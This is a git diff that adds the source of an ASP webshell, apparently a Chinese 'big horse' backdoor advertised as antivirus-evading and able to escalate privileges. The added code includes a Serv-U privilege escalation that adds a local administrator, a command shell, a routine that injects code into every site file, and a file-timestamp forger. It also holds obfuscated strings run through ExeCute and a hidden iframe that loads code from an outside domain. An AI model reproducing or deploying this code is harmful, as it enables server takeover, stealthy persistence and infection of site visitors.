+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�����</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user userSea passSea /add & net localgroup administrators userSea /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·������:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:function lIl(bb)
+but=22
+for i = 1 to len(bb)
+if mid(bb,i,1)<>"��" then
+If Asc(Mid(bb, i, 1)) < 32 Or Asc(Mid(bb, i, 1)) > 126 Then
+a = a & Chr(Asc(Mid(bb, i, 1)))
+else
+pk=asc(mid(bb,i,1))-but
+if pk>126 then
+pk=pk-95
+elseif pk<32 then
+pk=pk+95
+end if
+a=a&chr(pk)
+end if
+else
+a=a&vbcrlf
+end if
+next
+lIl=a
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf)):function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+
+case "apjdel":apjdel():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+%></body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>
\ No newline at end of file
diff --git a/www-7jyewu-cn/牛逼免杀提权隐藏大马.asp b/www-7jyewu-cn/牛逼免杀提权隐藏大马.asp
new file mode 100644
index 0000000..0991789
--- /dev/null
+++ b/www-7jyewu-cn/牛逼免杀提权隐藏大马.asp
@@ -0,0 +1,629 @@
+<%
+
+UserPass="admin"'	����
+'------------------------�������ڷǷ�;��----------------------
+mmname="ţ����ɱ��Ȩ���ش���"
+bottomad="����! �ſ��Ƿ�������������!"
+blogurl="http://aspmuma.cccpan.com"
+'----------------------һ�к���������޹�----------------------
+color1	="#000000"                                    'color1	="#000000"     
+color2	="#00ff00"                                    'color1	="#00ff00"    
+color3	="#FFFFCC"                                    'color1	="#FFFFCC"    
+color4  ="#fff"                                       'color1	="#fff"    
+color5	="#000000"                                    'color1	="#000000"    
+color6	="#000"                                       'color1	="#000"    
+color7  ="#FFF"                                       'color1	="#FFF"    
+'----------------------ҳ����ɫ�Լ���----------------------������ԭ������ɫ����_�Է����Dz�֪��Ū������
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,""\"",""\\""):End Function:Function RRePath(S):RRePath=Replace(S,""\\"",""\""):End Function:URL=Request.ServerVariables(""URL""):ServerIP=Request.ServerVariables(""LOCAL_ADDR""):Action=Request(""Action""):Pos=2:RootPath=Server.MapPath("".""):WWWRoot=Server.MapPath(""/""):Serveru=request.servervariables(""http_host"")&url:FolderPath=Request(""FolderPath""):serverp=UserPass:Pn=pos*44:FName=Request(""FName""):pso=5:BackUrl=""<br><br><center><a href='javascript:history.back()'>����</a></center>"""
+
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"</title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:"&color1&";color:"&color2&";}"
+RRS"input,select,textarea{font-size: 12px;background-color:"&color3&";border:1px solid "&color4&"}"
+RRS".C{background-color:"&color5&";border:0px}"
+RRS".cmd{background-color:"&color6&";color:"&color7&"}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: #00fcfc;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
+RRS".am{color:#888;font-size:11px;}"
+RRS"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽڡ�"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL����������䡣</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"<tr>����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>������<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\����"")'>����</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>������<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>������<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>������<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>������<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>��<br>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸��ļ�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����س�������</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
